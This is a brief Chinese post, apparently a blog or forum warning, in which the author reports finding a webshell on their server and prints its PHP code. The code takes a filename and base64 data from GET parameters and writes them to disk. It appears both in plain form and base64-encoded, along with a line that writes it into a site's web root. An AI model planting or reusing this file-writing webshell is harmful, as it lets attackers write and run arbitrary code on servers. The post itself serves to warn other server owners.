今天在服务器发现了webshell木马文件盗取我的代码,大家记得注意
文件代码:
?id=0.php&openido=base64
@file_put_contents($_GET['id'], base64_decode(str_replace(" ", "+", $_GET['openido'])));
PD9waHANCkBmaWxlX3B1dF9jb250ZW50cygkX0dFVFsnaWQnXSwgYmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgiICIsICIrIiwgJF9HRVRbJ29wZW5pZG8nXSkpKTs=
$con = "PD9waHANCkBmaWxlX3B1dF9jb250ZW50cygkX0dFVFsnaWQnXSwgYmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgiICIsICIrIiwgJF9HRVRbJ29wZW5pZG8nXSkpKTs=";
echo file_put_contents('/www/wwwroot/weiqing.daoreyoulu.top/8.php',base64_decode($con)); //生成文件>
echo file_get_contents('/www/wwwroot/weiqing.daoreyoulu.top/8.php'); //读取文件内容
print_r(ini_get("open_basedir")."</br>");
这是一段上传文件代码

浙公网安备 33010602011771号